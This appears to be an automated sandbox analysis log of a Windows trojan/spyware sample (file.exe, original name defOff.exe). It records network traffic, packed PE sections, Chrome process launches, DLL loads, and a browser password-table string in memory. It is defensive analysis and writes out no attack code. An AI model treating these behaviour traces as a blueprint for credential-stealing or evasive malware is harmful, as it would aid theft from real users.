                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.8:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.8:49819 version: TLS 1.2

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069FF360_2_0069FF36
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065098D80_2_065098D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065098E00_2_065098E0
                Source: file.exe, 00000000.00000003.1809071305.0000000005DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1805281196.0000000005DF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1827284924.0000000005968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794650893.0000000005E92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1803089927.0000000005DE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795941670.0000000005EA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799028326.0000000005DED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794750569.0000000005DE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793735575.0000000005E99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800201690.0000000005DEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793199683.0000000005DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798257009.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1809597075.0000000005DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1827384179.000000000594A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795182331.0000000005EA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796173569.0000000005DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801159707.0000000005F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794266049.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799259628.0000000005DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791440677.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791180074.0000000005BE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797470591.0000000005ECB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796941283.0000000005F9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797926346.0000000005DE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794002749.0000000005DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799145156.0000000005EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794090861.0000000005E9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1792752178.0000000005E88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801554107.0000000005EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791626976.0000000005E7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796662116.0000000005DE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800323253.0000000005EF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795403237.0000000005EB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794907431.0000000005E97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798362821.0000000005DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791267085.0000000005A4A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800563913.0000000005EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1802287203.0000000005F06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794339662.0000000005DE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1802452402.000000000602C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793912210.0000000005E94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000002.1948006174.0000000006366000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1827440711.00000000011FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791716943.0000000005A47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793374434.0000000005DEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1802582854.0000000005DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800442039.0000000005DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1807151811.0000000005DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1792655931.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1802713810.0000000005F1D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795009607.0000000005F5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798037611.0000000005ED3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1808102569.000000000604B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800077799.0000000005FF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1808484920.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796488977.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799706479.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1827248069.00000000059FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795079752.0000000005DEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793458476.0000000005E90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795533271.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795640770.0000000005EAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1806145736.0000000005F27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1794178066.0000000005DE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797046385.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793641008.0000000005DE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793550348.0000000005F3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797812912.0000000005EE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801356047.0000000005DE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800811356.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791533497.0000000005DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797255024.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801937319.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799373981.0000000005EEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801058085.0000000005DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793822151.0000000005DE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793288937.0000000005E84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796287350.0000000005EB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1803479710.0000000005F1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1804854556.0000000006050000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798450474.0000000005ED4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000002.1947370396.00000000060A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797698227.0000000005DEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796063705.0000000005F75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1793009759.0000000005E85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800688236.000000000600E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797584193.0000000005FBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1808696744.0000000005F26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798563103.0000000005DE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798149172.0000000005DE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1791355842.0000000005DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798801847.0000000005ED7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796837249.0000000005EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795826811.0000000005DE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795725339.0000000005F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797359409.0000000005DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1796391226.0000000005DE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1807577949.0000000005F12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1801753319.0000000006014000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1795286047.0000000005DE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1808917569.0000000006070000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1800933647.0000000005F0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1792890270.0000000005DEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1798912847.0000000005FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1809223120.0000000005F26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1799495306.0000000005DE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exe, 00000000.00000003.1797151230.0000000005EC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ZLIB complexity 1.0003675622693726
                Source: file.exeStatic PE information: Section: nxovzswj ZLIB complexity 0.9949623414376322
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/70@9/6
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000003.1542287597.0000000005964000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1542700018.0000000005945000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1566830793.0000000005963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 36%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: file.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1828,i,11464838882767469421,13980832017172917232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1988,i,12511401562534462833,16217488018526680522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1828,i,11464838882767469421,13980832017172917232,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1988,i,12511401562534462833,16217488018526680522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
